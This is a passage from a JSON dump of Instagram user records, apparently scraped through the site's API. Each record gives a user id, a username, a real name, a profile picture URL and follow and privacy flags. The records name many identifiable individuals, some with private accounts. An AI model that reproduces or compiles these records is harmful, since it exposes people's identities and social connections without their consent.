"https://instagram.fmdz5-1.fna.fbcdn.net/v/t51.2885-19/44884218_345707102882519_2446069589734326272_n.jpg?_nc_ht=instagram.fmdz5-1.fna.fbcdn.net&_nc_ohc=proBC-QYsOAAX8IRq_r&edm=AL4D0a4BAAAA&ccb=7-4&oh=b19a68b94134b80e080bca492fb90533&oe=6104094F&_nc_sid=712cc3&ig_cache_key=YW5vbnltb3VzX3Byb2ZpbGVfcGlj.2-ccb7-4", "is_private": true, "is_verified": false, "followed_by_viewer": false, "requested_by_viewer": false}, {"id": "40732857828", "username": "otaku.sem.mutivo", "full_name": "otaku sem motivo", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/119177719_310853430206164_7978674344085698825_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=k_Z6yeQuqeIAX_RIrRU&edm=AOG-cTkBAAAA&ccb=7-4&oh=b059b9775d72dba582f78aeb37bb151b&oe=61048EA1&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": false, "requested_by_viewer": false}, {"id": "40221889169", "username": "onlyart895", "full_name": "Gabriel Vinicius", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/194475490_338291137689347_7503578402860619911_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=5C3Tbhi2uhAAX8NC8aP&edm=AOG-cTkBAAAA&ccb=7-4&oh=d91e2389c346acfad02a62f2166587f6&oe=610579FF&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "8375344901", "username": "_phluan", "full_name": "Luan \ud83d\udca5\ud83c\udfad", "profile_pic_url": "https://instagram.fmdz5-1.fna.fbcdn.net/v/t51.2885-19/44884218_345707102882519_2446069589734326272_n.jpg?_nc_ht=instagram.fmdz5-1.fna.fbcdn.net&_nc_ohc=proBC-QYsOAAX8IRq_r&edm=AL4D0a4BAAAA&ccb=7-4&oh=b19a68b94134b80e080bca492fb90533&oe=6104094F&_nc_sid=712cc3&ig_cache_key=YW5vbnltb3VzX3Byb2ZpbGVfcGlj.2-ccb7-4", "is_private": true, "is_verified": false, "followed_by_viewer": false, "requested_by_viewer": false}, {"id": "16664504840", "username": "micaelnetot55", "full_name": "", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/119344032_142019154257705_6349899826463608176_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=72f3mH6cuVUAX9Zv2nN&edm=AOG-cTkBAAAA&ccb=7-4&oh=17577697c9b578da99c78a8ffce4a215&oe=6103D03D&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": false, "requested_by_viewer": false}, {"id": "36124639716", "username": "higor8016", "full_name": "Higor", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/119643833_663406184380071_3579104869963383601_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=or250GHO2JwAX98yZxe&edm=AOG-cTkBAAAA&ccb=7-4&oh=403b808a07cb0880bd9e5a618169aa94&oe=61043BE1&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": false, "requested_by_viewer": false}, {"id": "6161226138", "username": "kaykyneves_", "full_name": "Kayky Neves", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/218773860_351504869769679_747102871553508173_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=5MChdW4Yr40AX9_29sh&edm=AOG-cTkBAAAA&ccb=7-4&oh=d9c2921dba3aeb995b15837425ceedc3&oe=610596B0&_nc_sid=282b66", "is_private": true, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "2303585275", "username": "gamerstricks_2020", "full_name": "Louren\u00e7o Dibo", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/161274447_233221605196029_7667682499664050261_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=VOIPD9MFdWUAX_dVdIC&edm=AOG-cTkBAAAA&ccb=7-4&oh=f6395ad37e01e4973d71773143d38ad5&oe=6105B7E9&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "41872969052", "username": "iae_leo_016", "full_name": "leo", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/119471335_691686641428066_6683261733040535051_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=ac8tGn0BukEAX8URIll&edm=AOG-cTkBAAAA&ccb=7-4&oh=d5d37c7b9226ed2186b47b564e79e630&oe=6103EF62&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": false, "requested_by_viewer": false}, {"id": "26690958700", "username": "pierrewall20.999", "full_name": "\ud835\udc4a\ud835\udc4e\ud835\udc59\ud835\udc59\ud835\udc4e\ud835\udc50\ud835\udc52 \ud835\udc43\ud835\udc56\ud835\udc52\ud835\udc5f\ud835\udc5f\ud835\udc52", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/185509141_427157571724046_8650231474657777049_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=sZCptg8CYcYAX_l2j9H&edm=AOG-cTkBAAAA&ccb=7-4&oh=7ae9ac5741c26fb51c517eb268c0eb5c&oe=61058FD9&_nc_sid=282b66", "is_private": true, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "41462589567", "username": "sad_m.e.m.e.s", "full_name": "Sad_", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/119473382_2820018564898620_929021488236400702_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=uKI2FSuAwUgAX9XNZhc&edm=AOG-cTkBAAAA&ccb=7-4&oh=134cb9dfc9a7bd0252788f2168ba2327&oe=6105B98B&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": false, "requested_by_viewer": false}, {"id": "28590090184", "username": "ygor_kaian", "full_name": "Ygor Da Hora", "profile_pic_url": "https://instagram.fmdz5-1.fna.fbcdn.net/v/t51.2885-19/44884218_345707102882519_2446069589734326272_n.jpg?_nc_ht=instagram.fmdz5-1.fna.fbcdn.net&_nc_ohc=proBC-QYsOAAX8IRq_r&edm=AL4D0a4BAAAA&ccb=7-4&oh=b19a68b94134b80e080bca492fb90533&oe=6104094F&_nc_sid=712cc3&ig_cache_key=YW5vbnltb3VzX3Byb2ZpbGVfcGlj.2-ccb7-4", "is_private": false, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "40297252823", "username": "caiovitor452", "full_name": "Caio Vitor", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/144724470_195804698942251_8435128799142778933_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=1hsZSCCTNw4AX90NGq3&edm=AOG-cTkBAAAA&ccb=7-4&oh=d665a4cd9e3523ec50b08e6229f773d1&oe=61044BB9&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "7029872541", "username": "cartolaroxo_game", "full_name": "???", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/119646629_402591887392853_8385934576129120901_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=sLQudW4P3FwAX8mMapG&edm=AOG-cTkBAAAA&ccb=7-4&oh=e1cdb73a07350c785f07708cde656db7&oe=61053A4F&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": false, "requested_by_viewer": false}, {"id": "21981405816", "username": "gabriel_tel7", "full_name": "Gabriel Tel", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/107958174_655718455153514_2356156211708583671_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=7YLhRVwpO4MAX-HrPm_&tn=wZ7kAwmJb39iOv7J&edm=AOG-cTkBAAAA&ccb=7-4&oh=350096c3b254f01d9bd5d016302ff5ae&oe=61041AED&_nc_sid=282b66", "is_private": true, "is_verified": false, "followed_by_viewer": false, "requested_by_viewer": false}, {"id": "39714899658", "username": "nobrutvkkkkkkkkkkkkk", "full_name": "nobru", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/119049273_3246770975431340_8247214022524393271_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=4nsd-1FLxD4AX8HC2Et&edm=AOG-cTkBAAAA&ccb=7-4&oh=e7e3a42482871cb00fcf93ae32ae03d4&oe=6105B523&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": false, "requested_by_viewer": false}, {"id": "39482653889", "username": "meemesz1", "full_name": "Memesz", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/154314733_786619898931889_115460582853040720_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=AVfEQH7LhI8AX_sHG2W&tn=wZ7kAwmJb39iOv7J&edm=AOG-cTkBAAAA&ccb=7-4&oh=f444db2de6c3e664693a538fd12e99bf&oe=610445E9&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": false, "requested_by_viewer": false}, {"id": "37709008120", "username": "kauanllucas67", "full_name": "Kauan Lucas", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/118883021_329514851586832_2770325422541308724_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=LXh4OVwRYHkAX_sxf-o&edm=AOG-cTkBAAAA&ccb=7-4&oh=36d89a002b9be9fcfe8524ab4604a40d&oe=610488F0&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "29792895785", "username": "gefacilitiesmope", "full_name": "GE FACILITIES", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/119697398_686234655323756_4637930127599236257_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=dS_mEaL5a4IAX-Le9N7&edm=AOG-cTkBAAAA&ccb=7-4&oh=3da25461a150972ddfa06f5693207c7e&oe=6104610A&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": false, "requested_by_viewer": false}, {"id": "25094689596", "username": "gademirdacosta", "full_name": "Ademir da costa Guimar\u00e3es", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/129736198_773406166586072_3202439577528625731_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=_zvugTsncVAAX-e4hLF&edm=AOG-cTkBAAAA&ccb=7-4&oh=2769e801a578849ea7f78e7c13d2ffe7&oe=6103EFCF&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": false, "requested_by_viewer": false}, {"id": "16967302685", "username": "____r_i_a_n____", "full_name": "Rian Silva Santos", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/200268009_313955270353216_6939936925603856174_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=Gian42323_AAX_IZ-c4&edm=AOG-cTkBAAAA&ccb=7-4&oh=ac86bb0e95c9257d5a0ba555976698d6&oe=61052FDF&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "14558751868", "username": "185ro", "full_name": "\ud83d\udc49emagrecer com sa\u00fade", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/119580125_262738211440325_4223933035268005901_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=ra5LGAXs-CsAX_GauTm&tn=wZ7kAwmJb39iOv7J&edm=AOG-cTkBAAAA&ccb=7-4&oh=c3c983453e3f04c88f3d20e17b2310a8&oe=6104C188&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": false, "requested_by_viewer": false}, {"id": "40673271118", "username": "stalker__oi__", "full_name": "", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/118285703_159335672461445_6337160615566326883_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=Dgi4P22U8CYAX-ufg5t&edm=AOG-cTkBAAAA&ccb=7-4&oh=f96d2589961958a8af43fd047946143c&oe=610433E8&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "32344228116", "username": "ryanppfhd", "full_name": "RyanppfHD", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/139910067_710353649845050_1702459414532787811_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=Lhro31O3EiQAX_Vu5j4&edm=AOG-cTkBAAAA&ccb=7-4&oh=b06ad39481cda46544e0aefceab22172&oe=61043635&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "41412242991", "username": "eo_joao_ta_14", "full_name": "Jo\u00e3o Victor", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/131900757_711494546462219_6885854597781287712_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=N7yX3ZWPi2IAX-PVWZj&edm=AOG-cTkBAAAA&ccb=7-4&oh=c17afbd2bf1a739d78b7afcb339ba2da&oe=6104F1BF&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "7143605439", "username": "lucasocurioso2017", "full_name": "Lucas GAMEPLAYS E Variedades", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/27878491_948392415335462_1126395593313222656_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=6Cu6lwVfeoUAX9XyZTN&edm=AOG-cTkBAAAA&ccb=7-4&oh=8d165fff27ef3874489bfa86a6623110&oe=610548B2&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "41310326263", "username": "renato__schimidt", "full_name": "Renato Schimidt", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/118781448_345403146640558_532949034943272316_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=ui0cM5iD5ksAX8RfejO&edm=AOG-cTkBAAAA&ccb=7-4&oh=5f6b288220df56d7399d53efa925af22&oe=6103D7CC&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "18499192189", "username": "weltonnunesmartin", "full_name": "Welton Nunes Martin", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/151361729_259246872540769_1661067849949707200_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=DIWob84tmeUAX9GQfZ6&tn=wZ7kAwmJb39iOv7J&edm=AOG-cTkBAAAA&ccb=7-4&oh=955c26a63a05f8cbac7d4ad65688f371&oe=6105BAAC&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": false, "requested_by_viewer": false}, {"id": "7908975521", "username": "ytlooter", "full_name": "Black-looter", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/119066031_2391606194467616_80477497516689011_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=_uiyeBsjumEAX-UFeMP&edm=AOG-cTkBAAAA&ccb=7-4&oh=41637f4c590d9995bfd2aac3d56339b9&oe=6104E0DC&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": false, "requested_by_viewer": false}, {"id": "41056758322", "username": "bethgamer_rs", "full_name": "BethGamerRS", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/184130051_498946581533542_2362990307400012942_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=6e598yWdwf4AX93Ga0L&tn=wZ7kAwmJb39iOv7J&edm=AOG-cTkBAAAA&ccb=7-4&oh=70c24534a0fd8b7e1b2553e3068f0e8e&oe=610429FF&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "39803262748", "username": "cristhiane_.silva", "full_name": "cristhiane silva\u2661", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/123492491_177695500626379_7872681041389486558_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=aeGTBs6I_rMAX_PZ-Fe&edm=AOG-cTkBAAAA&ccb=7-4&oh=e1a0100d1e42d73ce742512a531da6ff&oe=61055813&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "34405782665", "username": "will_k101", "full_name": "", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/144720439_2254427398034909_7775834885867772734_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=2m0EiAuwvpIAX-IK36L&edm=AOG-cTkBAAAA&ccb=7-4&oh=248a829ad9f8668d89f262d6ccc4b427&oe=610425F3&_nc_sid=282b66", "is_private": true, "is_verified": false, "followed_by_viewer": false, "requested_by_viewer": false}, {"id": "36375827110", "username": "xbabacotexx", "full_name": "JhowNateXx", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/195130060_309656420883199_569075017308693663_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=sneonEQWTLUAX-DuzZM&edm=AOG-cTkBAAAA&ccb=7-4&oh=d4362f3b5a7bee31bbb44d087907ad9f&oe=6104BC5A&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "41224521576", "username": "thiagocoli1", "full_name": "Thiago Oliveira", "profile_pic_url": "https://instagram.fpgz2-1.fna.fbcdn.net/v/t51.2885-19/44884218_345707102882519_2446069589734326272_n.jpg?_nc_ht=instagram.fpgz2-1.fna.fbcdn.net&_nc_ohc=proBC-QYsOAAX_88vI0&edm=ANmP7GQBAAAA&ccb=7-4&oh=a7810048a40a876fec30c3b7538bbe86&oe=6104094F&_nc_sid=276363&ig_cache_key=YW5vbnltb3VzX3Byb2ZpbGVfcGlj.2-ccb7-4", "is_private": true, "is_verified": false, "followed_by_viewer": false, "requested_by_viewer": false}, {"id": "30886754937", "username": "curuja_gui", "full_name": "Guilherme Alves Assis Curuja", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/119709288_671683456775449_4111760833750664668_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=4RBqbszKfHkAX_-PH6H&edm=AOG-cTkBAAAA&ccb=7-4&oh=464e508e8c40bfc4fa79481f4ce020c8&oe=610416F4&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "41417525373", "username": "ps4img", "full_name": "", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/119125858_125405482603849_3392576378691124986_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=nb1pxd13qTkAX_GlfRK&edm=AOG-cTkBAAAA&ccb=7-4&oh=4413e726b83ea2f919c4af839847a543&oe=610494B7&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "28347247795", "username": "egggaribalda", "full_name": "Caio Santos Oliveira", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/175438014_501016734427266_3622136522809068795_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=XRPuyEPj-GwAX9S2--o&edm=AOG-cTkBAAAA&ccb=7-4&oh=ae23bf0af1bfa0d2d9917714b28f803f&oe=61040A8D&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "26465615875", "username": "tekasxh", "full_name": "Tekasxh", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/208770925_328541832064658_8232424430160722405_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=oMqxKX5q3wsAX-MZ5fZ&edm=AOG-cTkBAAAA&ccb=7-4&oh=fb9870df299144d21bbe7cb048a3da53&oe=610531C5&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "41619915100", "username": "xhitp_ost", "full_name": "", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/119194139_936509730181367_7416201151340216292_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=j47tzVLn-OwAX8pQpCz&edm=AOG-cTkBAAAA&ccb=7-4&oh=00f37ba6f84757133d8e5c0b26898873&oe=6103DB4F&_nc_sid=282b66", "is_private": true, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "41612699653", "username": "lobo_da_zueira", "full_name": "Lobo da Zueira", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/119047959_337620111008143_3463780898810447355_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=EBwjKAAPa7IAX_Xl2H0&edm=AOG-cTkBAAAA&ccb=7-4&oh=43b4464188b261f57b93d86a2ff96c5c&oe=61056B17&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "36121392057", "username": "nerdscuriosidade123", "full_name": "nerds curiosidade", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/121535284_160616752379317_1719196014668758706_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=TQMp8Oatnj8AX_QsSfx&edm=AOG-cTkBAAAA&ccb=7-4&oh=b84ee9e5c426dcd18f17c7d0d039b775&oe=6104FF30&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "40464290022", "username": "mo.ses2580", "full_name": "moses", "profile_pic_url": "https://instagram.fpgz2-1.fna.fbcdn.net/v/t51.2885-19/44884218_345707102882519_2446069589734326272_n.jpg?_nc_ht=instagram.fpgz2-1.fna.fbcdn.net&_nc_ohc=proBC-QYsOAAX_88vI0&edm=ANmP7GQBAAAA&ccb=7-4&oh=a7810048a40a876fec30c3b7538bbe86&oe=6104094F&_nc_sid=276363&ig_cache_key=YW5vbnltb3VzX3Byb2ZpbGVfcGlj.2-ccb7-4", "is_private": false, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "42014593939", "username": "perolaa02", "full_name": "P\u00e9rola mylly", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/120088350_338907837351918_5784663498738781843_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=kjFwP41MYxgAX-cJ48I&edm=AOG-cTkBAAAA&ccb=7-4&oh=12f7bec274d3b3d065be32d3ec1bbc0b&oe=6104B606&_nc_sid=282b66", "is_private": true, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "40442192496", "username": "amirhosseinam_1386", "full_name": "\u2665\ufe0f\u0627\u0645\u06cc\u0631\u062d\u0633\u06cc\u0646\u2665", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/119108957_2679930325582518_632256209245459181_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=w6oXHTd7CKIAX9wYQgF&edm=AOG-cTkBAAAA&ccb=7-4&oh=daf2577eb07ebec8956ae32677fc6d92&oe=610555DC&_nc_sid=282b66", "is_private": true, "is_verified": false, "followed_by_viewer": false, "requested_by_viewer": false}, {"id": "41821513530", "username": "vasconcelouco", "full_name": "Daniel Vasconce", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/121739379_118348050048757_1925575167650678421_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=rH6B33XfyKQAX9k67-Z&edm=AOG-cTkBAAAA&ccb=7-4&oh=7c78aec28a016ffec3f2236473e05cf1&oe=610596D6&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "12119013072", "username": "adinhaofc", "full_name": "Adam Samuel", "profile_pic_url": "https://instagram.fpgz2-1.fna.fbcdn.net/v/t51.2885-19/44884218_345707102882519_2446069589734326272_n.jpg?_nc_ht=instagram.fpgz2-1.fna.fbcdn.net&_nc_ohc=proBC-QYsOAAX_88vI0&edm=ANmP7GQBAAAA&ccb=7-4&oh=a7810048a40a876fec30c3b7538bbe86&oe=6104094F&_nc_sid=276363&ig_cache_key=YW5vbnltb3VzX3Byb2ZpbGVfcGlj.2-ccb7-4", "is_private": false, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "41560795327", "username": "leonardoribeiroyt", "full_name": "leonardoribeiroyt", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/186832983_1288859294849488_5968516513878087854_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=GvweHEWYZoAAX_DcUXe&tn=wZ7kAwmJb39iOv7J&edm=AOG-cTkBAAAA&ccb=7-4&oh=e915957214706d7a102c7d27e185b370&oe=61049BD3&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "13732509796", "username": "ivanir895", "full_name": "Ivanir Rodrigues", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/119045521_197580611796442_8178844979751050628_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=2tOk4fXLpAoAX8ZTTct&edm=AOG-cTkBAAAA&ccb=7-4&oh=ffdfde3390310ab5217386ee64276146&oe=6104C22D&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "39656343599", "username": "henrique_ricard", "full_name": "Henrique", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/119495034_1148872242173579_6977795833650599049_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=51D3SJmR-isAX82ahgx&edm=AOG-cTkBAAAA&ccb=7-4&oh=c87bbba029c1d09079d7897979d41821&oe=61054D68&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": false, "requested_by_viewer": false}, {"id": "41578838729", "username": "luizmiguel6115", "full_name": "LuizMiguel615", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/206255177_170273171744187_6419083622719159384_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=SjD1c4TLiv8AX-kGgeB&edm=AOG-cTkBAAAA&ccb=7-4&oh=5443abda14fae5cb88375a611c9b3857&oe=61045883&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": false, "requested_by_viewer": false}, {"id": "21724238027", "username": "tryborg272727", "full_name": "Marcos Antonio", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/173939569_473194650682966_8986071486626586490_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=o9IIdl44rX0AX_UV5l0&edm=AOG-cTkBAAAA&ccb=7-4&oh=86e4be696492f187b5f80443edc27e01&oe=6104E2E8&_nc_sid=282b66", "is_private": false, "is_verified": false, "followed_by_viewer": true, "requested_by_viewer": false}, {"id": "2278465953", "username": "leonardo_gomes1", "full_name": "Leonardo Gomes", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/210448937_368836927950878_191157214894920723_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=A-I4x0b5uZIAX9Uq1p0&edm=AOG-cTkBAAAA&ccb=7-4&oh=f877dc4ea079227505f75f63e8cec38c&oe=610462D3&_nc_sid=282b66", "is_private": true, "is_verified": false, "followed_by_viewer": false, "requested_by_viewer": false}, {"id": "41159128647", "username": "heartbeat_gs", "full_name": "Heartbeat Game Studio", "profile_pic_url": "https://instagram.fudi1-2.fna.fbcdn.net/v/t51.2885-19/s150x150/118781218_309137926814490_829509760288043619_n.jpg?_nc_ht=instagram.fudi1-2.fna.fbcdn.net&_nc_ohc=u2cvZjS1AoYAX9ZmtHA&edm=AOG-cTkBAAAA&ccb=7-4&oh=6db9b5d47dd24f37288888e9af35d8aa&oe=6104DD29&_nc_sid=282b66", "is_private": false, "is_verified": false, 